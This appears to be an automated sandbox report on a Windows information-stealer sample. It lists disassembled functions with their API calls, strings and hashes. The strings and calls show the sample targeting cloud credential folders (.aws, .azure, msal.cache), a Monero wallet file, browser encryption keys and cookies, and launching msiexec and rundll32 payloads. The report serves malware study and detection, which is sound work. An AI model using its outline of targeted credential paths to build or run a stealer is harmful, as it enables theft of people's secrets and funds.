                                    • Opcode Fuzzy Hash: 1a16ab7ddd4a48ccb42331f36b0b380b85a48af2271e8b9f4a8f3b26a5984f88
                                    • Instruction Fuzzy Hash: E2E15175910108ABCB54EBA0DDA6EEE7379AF25301F5045A8F106770A1EF71BE08CB76
                                    Function 001A84B0 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,00E2B870,00000000,00020019,00000000,001B05BE), ref: 001A8534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001A85B6
                                    • wsprintfA.USER32 ref: 001A85E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001A860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A8629
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?$p$
                                    • API String ID: 3246050789-3612168314
                                    • Opcode ID: 634bf937207bab6c20ef6f081c88be814b196952b53a6c607809258eb5c40f90
                                    • Instruction ID: 08b8100a08def012a66ad2da8e76029e332cefba6112b7d96857ad33f6d0ea84
                                    • Opcode Fuzzy Hash: 634bf937207bab6c20ef6f081c88be814b196952b53a6c607809258eb5c40f90
                                    • Instruction Fuzzy Hash: A6812A75910218ABDB68DF54CD91FEAB7B8BF19700F5082D8E10AA6180DF706F84CFA5
                                    Function 0019CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E2D040,00000000,?,001B1544,00000000,?,?), ref: 0019CB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0019CB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0019CB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0019CBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0019CBD9
                                    • StrStrA.SHLWAPI(?,00E2CFF8,001B0B56), ref: 0019CBF7
                                    • StrStrA.SHLWAPI(00000000,00E2D130), ref: 0019CC1E
                                    • StrStrA.SHLWAPI(?,00E2DEC8,00000000,?,001B1550,00000000,?,00000000,00000000,?,00E29170,00000000,?,001B154C,00000000,?), ref: 0019CDA2
                                    • StrStrA.SHLWAPI(00000000,00E2DE88), ref: 0019CDB9
                                      • Part of subcall function 0019C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0019C971
                                      • Part of subcall function 0019C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0019C97C
                                    • StrStrA.SHLWAPI(?,00E2DE88,00000000,?,001B1554,00000000,?,00000000,00E291E0), ref: 0019CE5A
                                    • StrStrA.SHLWAPI(00000000,00E28F20), ref: 0019CE71
                                      • Part of subcall function 0019C920: lstrcat.KERNEL32(?,001B0B47), ref: 0019CA43
                                      • Part of subcall function 0019C920: lstrcat.KERNEL32(?,001B0B4B), ref: 0019CA57
                                      • Part of subcall function 0019C920: lstrcat.KERNEL32(?,001B0B4E), ref: 0019CA78
                                    • lstrlen.KERNEL32(00000000), ref: 0019CF44
                                    • CloseHandle.KERNEL32(00000000), ref: 0019CF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 0d15947327f5c3945aa4fcb54e8913a80a26e54646c65df65833f1f4caa7b7cc
                                    • Instruction ID: 6a1926fd56dc878701c1bc5d9441354a06652b1ce8cb6a5d58c4b95735e259f3
                                    • Opcode Fuzzy Hash: 0d15947327f5c3945aa4fcb54e8913a80a26e54646c65df65833f1f4caa7b7cc
                                    • Instruction Fuzzy Hash: C4E11E75910108ABCB54EFA4DCA2FEEB779AF25300F8041A9F10663191EF707A49CF66
                                    Function 001A1520 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 310COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID: P$
                                    • API String ID: 2001356338-959893791
                                    • Opcode ID: ef0f3f433acf6f82b89bbfeac54982960315110d376425cb650997592480b0ba
                                    • Instruction ID: 3c0c47c2e1556aa2c8fb28f8049eed7999f5b5f327bd2ba7f5129f7e0a3213fc
                                    • Opcode Fuzzy Hash: ef0f3f433acf6f82b89bbfeac54982960315110d376425cb650997592480b0ba
                                    • Instruction Fuzzy Hash: 6EC183B9900219ABCB14EF60DC99FDE7379BF65304F004599F509A7241EB70EA84CFA1
                                    Function 001A91A0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001A91FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg$
                                    • API String ID: 2244384528-1855096929
                                    • Opcode ID: 3f758ce938ef9cf3400843cef0bcc6c85e6423196333aac39011019c34cbe260
                                    • Instruction ID: bee70959efdf3823b222f6e4b90e42b7fc85f5ede7c596850ffa3cceca36bd5f
                                    • Opcode Fuzzy Hash: 3f758ce938ef9cf3400843cef0bcc6c85e6423196333aac39011019c34cbe260
                                    • Instruction Fuzzy Hash: A9714BB5A10208ABDF04DFE4DC89FEEB7B8BF49304F108118F516A7290EB74A944CB61
                                    Function 001A4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A5000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 001A501D
                                      • Part of subcall function 001A4B60: wsprintfA.USER32 ref: 001A4B7C
                                      • Part of subcall function 001A4B60: FindFirstFileA.KERNEL32(?,?), ref: 001A4B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 001A50A9
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B0FC4), ref: 001A4BC1
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B0FC8), ref: 001A4BD7
                                      • Part of subcall function 001A4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 001A4DCD
                                      • Part of subcall function 001A4B60: FindClose.KERNEL32(000000FF), ref: 001A4DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A5118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001A5135
                                      • Part of subcall function 001A4B60: wsprintfA.USER32 ref: 001A4C00
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B08D3), ref: 001A4C15
                                      • Part of subcall function 001A4B60: wsprintfA.USER32 ref: 001A4C32
                                      • Part of subcall function 001A4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 001A4C6E
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,00E2EB40), ref: 001A4C9A
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,001B0FE0), ref: 001A4CAC
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,?), ref: 001A4CC0
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,001B0FE4), ref: 001A4CD2
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,?), ref: 001A4CE6
                                      • Part of subcall function 001A4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 001A4CFC
                                      • Part of subcall function 001A4B60: DeleteFileA.KERNEL32(?), ref: 001A4D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 7b79e1cf129e114168d9c4176c8c4f31eb7103f18c76477e4dc49533b35125d6
                                    • Instruction ID: 039f42116b5b48e2c3a6a5b8efcc9cba6460c75900ba71a96c59db6b2aee693b
                                    • Opcode Fuzzy Hash: 7b79e1cf129e114168d9c4176c8c4f31eb7103f18c76477e4dc49533b35125d6
                                    • Instruction Fuzzy Hash: E14160BA94020867DB60F770EC97FED73285B65704F404994B689A60C1EFB4A7C8CB92
                                    Function 001A44D0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A453C
                                    • lstrcat.KERNEL32(?,00E2E7A0), ref: 001A455B
                                    • lstrcat.KERNEL32(?,?), ref: 001A456F
                                    • lstrcat.KERNEL32(?,00E2D0B8), ref: 001A4583
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001A8F20: GetFileAttributesA.KERNEL32(00000000,?,00191B94,?,?,001B577C,?,?,001B0E22), ref: 001A8F2F
                                      • Part of subcall function 0019A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0019A489
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                      • Part of subcall function 001A9550: GlobalAlloc.KERNEL32(00000000,001A462D,001A462D), ref: 001A9563
                                    • StrStrA.SHLWAPI(?,00E2E620), ref: 001A4643
                                    • GlobalFree.KERNEL32(?), ref: 001A4762
                                      • Part of subcall function 0019A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A23F
                                      • Part of subcall function 0019A210: LocalAlloc.KERNEL32(00000040,?,?,?,00194F3E,00000000,?), ref: 0019A251
                                      • Part of subcall function 0019A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A27A
                                      • Part of subcall function 0019A210: LocalFree.KERNEL32(?,?,?,?,00194F3E,00000000,?), ref: 0019A28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A46F3
                                    • StrCmpCA.SHLWAPI(?,001B08D2), ref: 001A4710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A4722
                                    • lstrcat.KERNEL32(00000000,?), ref: 001A4735
                                    • lstrcat.KERNEL32(00000000,001B0FA0), ref: 001A4744
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-3162483948
                                    • Opcode ID: 3d034b58f617ac86e22ca4719d7f345245094295cd4f5dbc951b8e6261f1a19d
                                    • Instruction ID: 7381351afee8ea7c04db21b4b49b88657f3ab09fceac9e994eba872c8c71cf36
                                    • Opcode Fuzzy Hash: 3d034b58f617ac86e22ca4719d7f345245094295cd4f5dbc951b8e6261f1a19d
                                    • Instruction Fuzzy Hash: 987165B6900208ABDB14EBB0DD96FEE7379AF99300F404598F60597181EB74DB48CBA1
                                    Function 001A3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A3415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A35AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 03a5515c6b08ae7caa07902b51ca4f4b2de10a637916018b7d02efa700ce9302
                                    • Instruction ID: 5c5b28f2e6742f1cd880851b9570a62828a29d2dbae88700bf6800aaacecb93d
                                    • Opcode Fuzzy Hash: 03a5515c6b08ae7caa07902b51ca4f4b2de10a637916018b7d02efa700ce9302
                                    • Instruction Fuzzy Hash: 64123175910108ABDB59FBE0DDA2FEEB739AF25300F404599F10666192EF306B49CF62
                                    Function 00199BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00199A50: InternetOpenA.WININET(001B0AF6,00000001,00000000,00000000,00000000), ref: 00199A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00199CAF
                                    • lstrcat.KERNEL32(?,001B12C4), ref: 00199CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00199CD5
                                    • lstrcat.KERNEL32(?,001B12C8), ref: 00199CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00199CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00199D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00199D17
                                    • lstrlen.KERNEL32(00000000), ref: 00199D26
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
